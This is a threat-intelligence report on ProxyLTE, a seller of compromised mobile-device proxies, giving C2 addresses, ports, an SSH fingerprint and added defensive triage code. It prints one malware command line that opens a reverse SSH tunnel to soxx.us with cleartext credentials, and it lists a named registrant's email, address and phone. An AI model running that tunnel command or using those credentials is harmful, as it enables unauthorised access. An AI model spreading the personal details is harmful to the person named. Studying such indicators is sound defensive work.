Summary
ProxyLTE, a supplier of US-based mobile and home router proxies, has been identified as one component in a large-scale fraud targeting a Wapack Labs client. ProxyLTE.com was created in late 2017, but associated malware was first observed in 2013. This report includes details on ProxyLTE malware and associated infrastructure.
Background
Beginning in 2018, Wapack Labs began tracking botnet activity affecting a client. As part of this analysis, we profiled the traffic to identify command and control (C2) channels. A common thread among the botnet communications was a popular mobile game – Player Unknown Battleground (PUBG). Additional analysis revealed that many of the bots linked to PUBG were subsequently rented out by ProxyLTE. This connection indicates a larger supply chain of compromised mobile devices originating from PUBG gamers with ProxyLTE operating as a major reseller.
Details
ProxyLTE.com was first registered in October 2017 and has since been advertised on several hacking sites on both the surface and dark webs, as well as in IRC chatrooms frequented by hackers. Both the mobile device and the home router proxies are offered for as little as $9 per day.
Figure 1: ProxyLTE Advertising
Figure 2: ProxyLTE Home Page
Wapack Labs obtained 46 mobile proxies from ProxyLTE as part of a trial. Our analysis revealed that over half of the proxies had made connections to Tencent’s PUBG chat endpoint at 49.51.42.110 within a 24-hour period, indicating the proxies were originally sourced from PUBG gamers. Additionally, a total of 11 C2s were identified, all hosted by the German hosting company Hetzner Online. All compromised proxies were managed on port 3665, 3666, or 4996. Additional traffic was observed on port 18080, which is the default port used for Monero cryptocurrency mining.
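The triage described above (share of proxies that contacted the PUBG chat endpoint within 24 hours, sessions to listed C2s on the management ports, Monero-port traffic, and the per-destination proxy count used for the COUNT column in Appendix A) can be reproduced over flow records. The following is an added example and not Wapack Labs’ tooling; the indicator values are the ones stated in this report, while the proxy addresses, timestamps and flow records are constructed for the demonstration.

```python
"""Added example (not Wapack Labs' code): triage proxy traffic the way the report
describes, over constructed flow records.

Assumed input: (proxy_ip, dst_ip, dst_port, epoch_seconds) tuples as a NetFlow
export would provide. Indicator values come from the report; every proxy address
and timestamp below is constructed.
"""
from collections import defaultdict

PUBG_CHAT_IP = "49.51.42.110"      # Tencent PUBG chat endpoint named in the report
MGMT_PORTS = {3665, 3666, 4996}    # ports used to manage the compromised proxies
MONERO_PORT = 18080                # default Monero port noted in the report
KNOWN_C2 = {                       # C2 addresses listed in the report
    "159.69.148.118", "159.69.148.13", "94.130.181.218", "159.69.215.125",
    "159.69.210.24", "159.69.12.225", "159.69.0.162", "195.201.252.238",
    "159.69.213.194", "95.216.179.82", "136.243.64.95",
}

# Constructed flow records: (proxy_ip, dst_ip, dst_port, timestamp).
# The 10.0.0.x proxies and 203.0.113.x / 198.51.100.x hosts are placeholders.
T0 = 1_560_000_000
FLOWS = [
    ("10.0.0.1", PUBG_CHAT_IP, 443, T0 + 100),
    ("10.0.0.1", "159.69.148.118", 3665, T0 + 200),
    ("10.0.0.2", PUBG_CHAT_IP, 443, T0 + 300),
    ("10.0.0.2", "159.69.148.13", 3666, T0 + 400),
    ("10.0.0.2", "203.0.113.9", 18080, T0 + 500),   # Monero-style traffic
    ("10.0.0.3", PUBG_CHAT_IP, 443, T0 - 200_000),  # older than the 24h window
    ("10.0.0.3", "136.243.64.95", 4996, T0 + 600),
    ("10.0.0.4", "198.51.100.7", 443, T0 + 700),    # ordinary traffic only
]


def pubg_linked_proxies(flows, now, window=24 * 3600):
    """Proxies that contacted the PUBG chat endpoint within the last `window` seconds."""
    return {p for p, dst, _, ts in flows if dst == PUBG_CHAT_IP and now - ts <= window}


def c2_sessions(flows):
    """Sorted (proxy, c2, port) triples: listed C2 reached on a management port."""
    return sorted({(p, dst, port) for p, dst, port, _ in flows
                   if dst in KNOWN_C2 and port in MGMT_PORTS})


def monero_port_users(flows):
    """Proxies with any flow to the Monero default port."""
    return {p for p, _, port, _ in flows if port == MONERO_PORT}


def destination_counts(flows):
    """Distinct proxies per destination IP (the COUNT column in Appendix A)."""
    seen = defaultdict(set)
    for p, dst, _, _ in flows:
        seen[dst].add(p)
    return {dst: len(ps) for dst, ps in seen.items()}


def summarize(flows, now):
    """Headline numbers an analyst would report for a batch of proxies."""
    proxies = {f[0] for f in flows}
    pubg = pubg_linked_proxies(flows, now)
    return {
        "proxies": len(proxies),
        "pubg_share": len(pubg) / len(proxies),
        "c2_sessions": c2_sessions(flows),
        "monero_port": sorted(monero_port_users(flows)),
        "top_destinations": sorted(destination_counts(flows).items(),
                                   key=lambda kv: -kv[1]),
    }


if __name__ == "__main__":
    for key, value in summarize(FLOWS, T0 + 1000).items():
        print(key, value)
```

The 24-hour window matters: a proxy whose last PUBG contact is older than the window (10.0.0.3 above) is not counted as PUBG-linked, but its management session to a listed C2 still surfaces through the port check.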
| C2 Servers | Port(s) | ASN |
| --- | --- | --- |
| 159.69.148.118 | 3665-3666 | Hetzner Online GmbH |
| 159.69.148.13 | 3665-3666 | Hetzner Online GmbH |
| 94.130.181.218 | 3665-3666 | Hetzner Online GmbH |
| 159.69.215.125 | 3665-3666 | Hetzner Online GmbH |
| 159.69.210.24 | 3665-3666 | Hetzner Online GmbH |
| 159.69.12.225 | 3665-3666 | Hetzner Online GmbH |
| 159.69.0.162 | 3665-3666 | Hetzner Online GmbH |
| 195.201.252.238 | 3665-3666 | Hetzner Online GmbH |
| 159.69.213.194 | 3665-3666 | Hetzner Online GmbH |
| 95.216.179.82 | 3665-3666 | Hetzner Online GmbH |
| 136.243.64.95 | 4996 | Hetzner Online GmbH |
Figure 3: Proxies obtained from ProxyLTE
The primary proxy endpoint provided in the ProxyLTE trial was 54.38.228.38, as shown in Figure 2. Passive DNS on this IP showed a record for infused.soxx.us. The soxx.us domain exposed a much larger infrastructure, linked by soxx.us subdomains as well as the following SSH fingerprint:
1a:04:f8:62:ab:0b:f8:18:5d:7e:26:a5:24:0a:c9:16
This additional infrastructure consists of over one hundred related domains and IPs. These domains and IPs were listed as C2 nodes in a number of malware specimens dating back to 2013. This included Windows executables and Android APKs, many of which appeared to be voice message applications, for example, “Craigslist-Voice-Message.exe” and “VoiceApp.apk.”
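The SSH fingerprint pivot above relies on deriving a fingerprint from each scanned host key and comparing it against known values. The following is an added example, not part of the report: it parses host-key lines in the form ssh-keyscan or known_hosts produce, computes the OpenSSH MD5 colon fingerprint and SHA256 fingerprint over the decoded key blob, and checks the result against a watchlist containing the fingerprint quoted above. The sample key is constructed (a placeholder ed25519 blob, not any real host’s key) and the 203.0.113.5 address is a placeholder.

```python
"""Added example (not from the report): OpenSSH host-key fingerprints for
infrastructure clustering.

Assumed input: "host keytype base64blob" lines as produced by ssh-keyscan.
The MD5 colon fingerprint is MD5 over the decoded key blob (what OpenSSH prints
with -E md5); the SHA256 form is base64 without padding, prefixed "SHA256:".
The sample key blob below is constructed, not a real host key.
"""
import base64
import hashlib
import struct

# Fingerprint from the report, tied to the soxx.us infrastructure.
WATCHLIST = {"1a:04:f8:62:ab:0b:f8:18:5d:7e:26:a5:24:0a:c9:16"}


def ssh_string(data: bytes) -> bytes:
    """Length-prefixed string in SSH wire format (RFC 4251)."""
    return struct.pack(">I", len(data)) + data


# Constructed ssh-ed25519 key blob: key type string + 32 placeholder key bytes.
_FAKE_KEY = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(32)))
SAMPLE_SCAN = "203.0.113.5 ssh-ed25519 " + base64.b64encode(_FAKE_KEY).decode()


def parse_keyscan_line(line: str):
    """Split a keyscan line and decode its key blob, checking the declared type."""
    host, keytype, blob_b64 = line.split()[:3]
    blob = base64.b64decode(blob_b64)
    (n,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + n] != keytype.encode():
        raise ValueError("key type does not match blob")
    return host, keytype, blob


def md5_fingerprint(blob: bytes) -> str:
    """Legacy OpenSSH fingerprint: 16 colon-separated hex bytes."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def sha256_fingerprint(blob: bytes) -> str:
    """Current OpenSSH default fingerprint style."""
    raw = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(raw).decode().rstrip("=")


def check_host(line: str, watchlist=WATCHLIST):
    """Fingerprint one scanned host and flag it if the MD5 form is on the watchlist."""
    host, keytype, blob = parse_keyscan_line(line)
    fp = md5_fingerprint(blob)
    return {"host": host, "keytype": keytype, "md5": fp,
            "sha256": sha256_fingerprint(blob), "watchlisted": fp in watchlist}


if __name__ == "__main__":
    print(check_host(SAMPLE_SCAN))
```

Because a host key is per-server rather than per-domain, the same fingerprint recurring across many IPs and subdomains is a strong sign that they are administered together, which is the link the report draws across the soxx.us infrastructure.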
A recent malware sample revealed poor operational security, with a cleartext SSH password observable in VirusTotal[1].
C:\Net.Framework4.5.9873289a789fa987fas8da7s8998d897asdfa98fas87fds8a7g9678g678sg678s6fsd7890h898d7h\System.exe" -ssh -R 14650:127.0.0.1:7908 soxx.us -l sox2 -pw 906090lol
The following table lists available profile data involving ProxyLTE.
| Indicator | Description |
| --- | --- |
| UIN 729425956 | ICQ Instant Messaging contact address |
| ProxyLTE@jabber.ru | Jabber contact address |
| @ProxyLTE | Telegram contact address |
| soxxadm@gmail.com | Gmail contact address |
| Proxylte.com | Primary website |
| Proxylte.us | Secondary website – partially functioning |
| paurel2211@gmail.com | Registrant email for proxylte.us |
| Paul Aurel | Registrant name for proxylte.us |
| 333 E 43rd St New York NY 10017 | Registrant address for proxylte.us |
| +1.4843441009 | Registrant phone number for proxylte.us |
Conclusion
ProxyLTE is part of a larger trend of growing mobile proxy botnets. Starting in mid-2018, Wapack Labs observed the use of mobile device proxies in various botnet activity and large-scale industrial fraud. A compromised mobile device offers several advantages for attackers. For one, malware removal on mobile devices is far less common and much more difficult than on regular computers, so an attacker can get more mileage out of a single mobile device. Second, mobile devices are more likely to change IP addresses, making IP blacklisting an unrealistic defense strategy.
As of the date of this report, ProxyLTE is one of a few providers of compromised mobile device proxies. Mobile device proxy rental is currently a lucrative business model since a newly recruited mobile device has very little chance of being blocked - a feature many will pay top dollar for. Wapack Labs also predicts the emergence of a ‘premium market’ of compromised mobile devices with the roll out of 5G as botnet herders can capitalize on the additional bandwidth.
Appendix A
The following table lists trending data on the top IPs communicating with ProxyLTE proxies, with “COUNT” representing the number of proxies each IP was seen communicating with. The PUBG Tencent IP, 49.51.42.110, was seen communicating with more than half of the proxies.
| IP | CC | COUNT | ASN |
| --- | --- | --- | --- |
| 35.211.30.253 | US | 39 | AS19527 Google LLC |
| 35.211.120.82 | US | 32 | AS19527 Google LLC |
| 17.252.226.85 | US | 26 | AS714 Apple Inc. |
| 159.69.199.138 | US | 26 | AS24940 Hetzner Online GmbH |
| 209.58.147.67 | US | 25 | AS394380 Leaseweb USA, Inc. |
| 54.192.13.223 | US | 24 | AS16509 Amazon.com, Inc. |
| 54.192.13.179 | US | 24 | AS16509 Amazon.com, Inc. |
| 54.192.13.238 | US | 23 | AS16509 Amazon.com, Inc. |
| 54.192.13.110 | US | 22 | AS16509 Amazon.com, Inc. |
| 69.16.175.10 | US | 21 | AS20446 Highwinds Network Group, Inc. |
| 54.230.79.235 | US | 21 | AS16509 Amazon.com, Inc. |
| 49.51.42.110 | CN | 21 | AS132203 Tencent Building, Kejizhongyi Avenue |
| 35.227.238.95 | US | 21 | AS15169 Google LLC |
| 35.227.210.77 | US | 21 | AS15169 Google LLC |
| 205.185.216.42 | US | 21 | AS20446 Highwinds Network Group, Inc. |
| 205.185.216.10 | US | 21 | AS20446 Highwinds Network Group, Inc. |
| 35.241.16.93 | US | 20 | AS15169 Google LLC |
| 178.162.216.177 | DE | 20 | AS28753 Leaseweb Deutschland GmbH |
| 69.16.175.42 | US | 19 | AS20446 Highwinds Network Group, Inc. |
| 35.241.57.186 | US | 19 | AS15169 Google LLC |
[1] https://www.virustotal.com//#/file/976c29b5b7288d2901f0eba4cbae9bd9728e6e68f1b62112a438f74985017f94/behavior